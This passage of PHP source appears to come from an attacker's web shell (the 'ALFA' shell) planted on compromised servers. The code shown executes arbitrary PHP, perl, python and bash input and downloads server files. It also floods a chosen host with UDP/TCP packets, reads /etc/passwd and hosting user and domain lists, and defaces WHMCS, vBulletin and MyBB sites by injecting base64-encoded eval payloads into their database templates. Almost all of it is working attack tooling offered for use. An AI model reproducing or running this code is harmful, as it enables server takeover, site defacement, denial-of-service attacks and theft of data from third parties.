echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}

}

echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';

break;

case 'touch':

@chdir($_POST['c']);

if( !empty($_POST['alfa3']) ) {

$time = strtotime($_POST['alfa3']);

if($time){

$touched = false;

if($chdir_fals&&$alfa_canruncmd){

alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");

$touched = true;

}

if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)

echo 'Fail!';

else

echo 'Touched!';

} else echo 'Bad time format!';

}

clearstatcache();

echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';

break;

case 'image':

@chdir($_POST['c']);

echo('<hr>');

$file = $_POST['alfa1'];

$image_info = @getimagesize($file);

if(is_array($image_info)||$chdir_fals){

$width = (int)$image_info[0];

$height = (int)$image_info[1];

if($chdir_fals&&$alfa_canruncmd){

$source = alfaEx("cat '".addslashes($file)."' | base64");

list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));

$mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));

$image_info['mime'] = $mime[1];

}else{

$source = __ZW5jb2Rlcg(__read_file($file, false));

}

$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";

if($width > 800){$width = 800;}

echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";

}

break;

}

echo '</div>';

alfaFooter();

}

function findicon($file,$type){

$s = 'http://solevisible.com/icons/';

$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');

if($type!='file'){

return ($file=='..'?$s.'back.png':$s.'folder.png');

}else{

$ext = explode('.',$file);

$ext = end($ext);

$ext = strtolower($ext);

return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');

}

}

function alfadlfile(){

if(isset($_POST['c'],$_POST['file'])){

$basename = rawurldecode(basename($_POST['file']));

$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);

$alfa_canruncmd = _alfa_can_runCommand(true,true);

if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){

ob_start("ob_gzhandler", 4096);

header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");

header("Content-Type: application/octet-stream");

if(isset($GLOBALS["glob_chdir_false"])){

$randname = $basename.rand(111,9999);

$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);

$filepath = $scriptpath."/".$randname;

if(_alfa_is_writable($scriptpath)){

alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");

readfile($filepath);

@unlink($filepath);

}else{

alfaEx("cat '".addslashes($_POST["file"])."'");

}

}else{

readfile($_POST['file']);

}

}else echo('Error...!');}}

function alfaphpeval(){

alfahead();

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){

echo '<div class=header>';

ob_start();

$INI=ini_get_all();

print '<table border=0><tr>'

.'<td class="listing"><font class="highlight_txt">Param</td>'

.'<td class="listing"><font class="highlight_txt">Global value</td>'

.'<td class="listing"><font class="highlight_txt">Local Value</td>'

.'<td class="listing"><font class="highlight_txt">Access</td></tr>';

foreach ($INI as $param => $values)

print "\n".'<tr>'

.'<td class="listing"><b>'.$param.'</td>'

.'<td class="listing">'.$values['global_value'].' </td>'

.'<td class="listing">'.$values['local_value'].' </td>'

.'<td class="listing">'.$values['access'].' </td></tr>';

$tmp = ob_get_clean();

$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);

$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

echo str_replace('<h1','<h2', $tmp) .'</div><br>';

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {

echo '<div class=header><style>.p {color:#000;}</style>';

ob_start();

phpinfo();

$tmp = ob_get_clean();

$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);

$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);

echo str_replace('<h1','<h2', $tmp) .'</div><br>';

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {

echo '<div class=header>';

ob_start();

$EXT=get_loaded_extensions();

echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';

echo '</div><br>';

}

$lang_html = "";

foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}

echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';

echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';

if(!empty($_POST['alfa1'])){

if($_POST['alfa3']=="php"){

ob_start();eval($_POST['alfa1']);

$result = htmlspecialchars(ob_get_clean());

}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){

if(isset($_SESSION["eval_tmpdir"])){

$tempdir = $_SESSION["eval_tmpdir"];

}else{

$tempdir = dirname(alfaEx("mktemp"));

$_SESSION["eval_tmpdir"] = $tempdir;

}

$lang = $_POST['alfa3'];

$filename = "temp".rand(11111,99999);

$temp = $tempdir."/".$filename ;

__write_file($filename, $_POST['alfa1']);

$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");

@unlink($filename);

@unlink($temp);

}

echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';

}

echo '</pre></div>';

alfafooter();

}

function alfahash(){

if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}

if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}

$stringTools = array(

'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',

'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',

'strrev ( $string )' => 'strrev($s)',

'bin2hex ( $string )' => 'bin2hex($s)',

'hex2bin ( $string )' => 'hex2bin($s)',

'md5 ( $string )' => 'md5($s)',

'sha1 ( $string )' => 'sha1($s)',

'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',

'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',

'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',

'crypt ( $string )' => 'crypt($s)',

'crc32 ( $string )' => 'crc32($s)',

'str_rot13 ( $string )' => 'str_rot13($s)',

'urlencode ( $string )' => 'urlencode($s)',

'urldecode ( $string )' => 'urldecode($s)',

'full_urlencode ( $string )' => 'full_urlencode($s)',

'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',

'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',

'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',

'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',

'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',

'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',

'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',

);

alfahead();

echo '<div class=header>';

echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";

foreach($stringTools as $k => $v)

echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";

echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";

if(!empty($_POST['alfa1'])){

$string = addslashes($_POST['alfa2']);

$string = str_replace('\"','"',$string);

$alg = $_POST['alfa1'];

$code = str_replace('$s',"'".$string."'",$alg);

ob_start();

eval('echo '.$code.';');

$res = ob_get_contents();

ob_end_clean();

if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';

}

echo "</div>";

alfaFooter();

}

function alfados(){

alfahead();

echo '<div class=header>';

echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';

if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){

echo __pre();

$packets=0;

ignore_user_abort(true);

$exec_time=(int)$_POST['alfa2'];

$time=time();

$max_time=$exec_time+$time;

$host=$_POST['alfa1'];

$port=(int)$_POST['alfa3'];

$method=$_POST['alfa4'];

$out = str_repeat('X',65000);

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";

echo "</pre>";

}

echo '</div>';

alfafooter();

}

function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}

function alfaIndexChanger(){

alfahead();

echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';

if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){

echo __pre();

echo "<center><center><div class='txtfont_header'>| Whmcs |</div>

<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">

";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td6' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "<br><div class='txtfont'>| Your Index |</div><br>

<textarea name=index rows='19' cols='103'><title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><br>

<input type='submit' value=' '>

</form></center></center>";

if(isset($_POST['alfa6'])){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa6'];

$path = $_POST['alfa5'];

$fname = $_POST['alfa4'];

$dbn = $_POST['alfa7'];

$dbp = $_POST['alfa8'];

$dbh = $_POST['alfa9'];

$index = $_POST['alfa10'];

$index = str_replace("\'","'",$index);

$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';

$saveData = __ZW5jb2Rlcg($deface);

$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");

$soleGet = mysqli_fetch_assoc($soleSave);

$tempSave1 = $soleGet['message'];

$tempSave = str_replace("'","\'",$tempSave1);

$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";

$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));

$create = "insert into tblclients (email) values('solevisible@fbi.gov')";

$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));

if(function_exists('curl_version')){

$AlfaSole = new AlfaCURL(true);

$saveurl = $AlfaSole->Send($path."/pwreset.php");

$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);

$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");

$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";

$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));

__alert('File Created...');

echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";

}else{

echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";

}}}}

if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){

echo __pre();

echo "<center><center><div class='txtfont_header'>| vBulletin |</div>

<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">

";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),

'td5' =>

array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "<br><div class='txtfont'>| Your Index |</div><br>

<textarea name='index' rows='19' cols='103'><title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><br>

<input type='submit' value=' '></form></center></center>";

if($_POST['alfa8']=='>>'){

$s0levisible="Powered By Solevisible";

$dbu = $_POST['alfa2'];

$dbn = $_POST['alfa3'];

$dbp = $_POST['alfa4'];

$dbh = $_POST['alfa5'];

$index = $_POST['alfa6'];

$prefix = $_POST['alfa7'];

$index=str_replace("\'","'",$index);

$set_index = "{\${eval(base64_decode(\'";

$set_index .= __ZW5jb2Rlcg("echo \"$index\";");

$set_index .= "\'))}}{\${exit()}}";

if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){

$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));

$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";

$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";

$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";

@mysqli_query($conn,$loli1) or die (mysqli_error($conn));

@mysqli_query($conn,$loli2) or die (mysqli_error($conn));

@mysqli_query($conn,$loli3) or die (mysqli_error($conn));

__alert('VB index changed...!');

}

}

}

if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {

echo __pre();

echo "<center><center><div class='txtfont_header'>| Mybb |</div>

<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>

";

$table = array('td1' =>

array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),

'td2' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),

'td3' =>

array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),

'td4' =>

array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')

);

create_table($table);

echo "<br><div class='txtfont'>| Your Index |</div><br>

<textarea name=mybbindex rows='19' cols='103'>

<title>Hacked By SUPERBONE X TEAM</title><b>Hacked By SUPERBONE X TEAM</b></textarea><p><input type='submit' value='' ></p></form></center></center>";

if(isset($_POST['alfa6'])){

$mybb_dbh = $_POST['alfa6'];

$mybb_dbu = $_POST['alfa7'];

$mybb_dbn = $_POST['alfa8'];

$mybb_dbp = $_POST['alfa9'];

$mybb_index = $_POST['alfa10'];

if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){

$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));

$prefix="mybb_";

$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";

$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));

__alert('MyBB index changed...!');

}

}

}

echo "</div>";

alfafooter();

}

function alfaproc()

{

alfahead();

echo "<Div class=header><br><center>";

if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))

$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;

if($GLOBALS['sys']=="win"){

$process=array(

"Task List" =>"tasklist /V",

"System Info" =>"systeminfo",

"Active Connections" => "netstat -an",

"Running Services" => "net start",

"User Accounts" => "net user",

"Show Computers" => "net view",

"ARP Table" => "arp -a",

"IP Configuration" => "ipconfig /all"

);}else{

$process=array(

"Process status" => "ps aux",

"Syslog" =>"cat /etc/syslog.conf",

"Resolv" => "cat /etc/resolv.conf",

"Hosts" =>"cat /etc/hosts",

"Cpuinfo"=>"cat /proc/cpuinfo",

"Version"=>"cat /proc/version",

"Sbin"=>"ls -al /usr/sbin",

"Interrupts"=>"cat /proc/interrupts",

"lsattr"=>"lsattr -va",

"Uptime"=>"uptime",

"Fstab" =>"cat /etc/fstab"

);}

foreach($process as $n => $link){

echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';

}

echo "</center><br>";

if(!empty($_POST['alfa1'])){

echo "<pre class='ml1' style='margin-top:5px' >";

if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}

echo alfaEx($cmd.$_POST['alfa1']);

echo '</pre>';

}

echo "</div>";

alfafooter();

}

function alfasafe(){

alfahead();

echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";

echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';

if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

echo __pre();

$solevisible9 = _alfa_file('/etc/named.conf');

if(is_array($solevisible9)){

foreach($solevisible9 as $solevisible13){

if(@eregi('zone',$solevisible13)){

preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);

if(strlen(trim($solevisible14[1][0])) > 2){

echo $solevisible14[1][0].'<br>';

}}}

}

}else{

echo __pre();

$users = _alfa_file("/etc/virtual/domainowners");

if(is_array($users)){

foreach($users as $boz){

$dom = explode(":",$boz);

echo $dom[0]."\n";}}}}

if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){

echo '

<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';

if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){

if(!_alfa_file_exists("/etc/virtual/domainowners")){

$site = trim($_POST['alfa7']);

$rep = str_replace(array("https://","http://","www."),"",$site);